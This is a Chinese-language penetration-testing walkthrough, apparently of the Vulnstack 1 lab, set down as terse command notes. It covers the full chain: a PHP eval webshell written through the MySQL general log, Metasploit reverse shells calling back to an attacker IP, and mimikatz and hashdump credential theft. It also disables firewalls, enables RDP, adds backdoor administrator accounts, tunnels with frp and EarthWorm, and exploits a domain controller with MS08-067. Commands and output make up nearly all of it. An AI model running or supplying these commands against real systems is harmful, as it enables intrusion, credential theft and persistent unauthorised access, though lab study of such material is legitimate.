一、获取shell
show variables like '%general%'; #查看日志状态
当开启general时,所执行的sql语句都会出现在stu1.log文件中。那么,如果修改generallogfile的值,那么所执行的sql语句就会对应生成对应的文件中,进而getshell。SET GLOBAL general_log='on'
SHOW VARIABLES LIKE '%secure%'
SET GLOBAL general_log_file='C:/phpStudy/www/test1.php' 改变日志生成的地址
写入一句话
SELECT'<?php eval($_POST["cmd"]);?>'
cs上线
shell ipconfig
shell systeminfo
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf exploit(handler) > set lport 2222
lport =>2222msf exploit(handler) > exploit
getsystem提权成功
迁移进程
关闭防火墙
netsh firewall set opmode disable
获取密码
run hashdump
load mimikatz
wdigest
直接cs
netsh advfirewall set allprofiles state off
关墙
进行远程登录
开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
添加管理员账号
net user username password /add
net localgroup administrators username /add
net user bienao 123.com /add
net localgroup administrators bienao /add
65001 UTF-8代码页 解决乱码
chcp 65001
远程连接
rdesktop 192.168.44.128:3389
探测域内存活主机
run windows/gather/enum_ad_computers
添加路由
run autoroute -s 192.168.52.0/24
run autoroute -p
信息收集
判断域控
shell net view /domain
shell net time /domain
执行探测
for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i
arp -a 主机探测
nmap --script=vuln 192.168.52.141
nmap --script=vuln 192.168.52.138
修改frps.ini文件
vim frps.ini
启动frp
./frps -c frps.ini
frpc.exe -c frpc.ini
或者(ip不一样)
Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024
这条命令的意思是说让公网服务器监听1080和1024端口,等待攻击者机器访问1080端口,目标机器访问1024端口
windows: .\ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024
proxychains代理
vi /etc/proxychains.conf
msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141
rhosts => 192.168.52.141
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > run
net user bienao 123.com /add
net localgroup administrators bienao /add
netsh advfirewall set allprofiles state off 关墙
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开3389
远程连接
rdesktop 192.168.44.141:3389
远程失败
getuid
run hashdump
wdigest #获取系统账户信息
load mimikatz #加载mimikatz
kerberos #获取明文
域控弹回CS
meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler
msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129
lhost => 192.168.44.129
msf5 exploit(windows/local/payload_inject) > set lport 1111
lport => 1111
msf5 exploit(windows/local/payload_inject) > set session 2
session => 2
msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf5 exploit(windows/local/payload_inject) > run
参考学习
https://blog.csdn.net/qq_42349134/article/details/103135062
https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F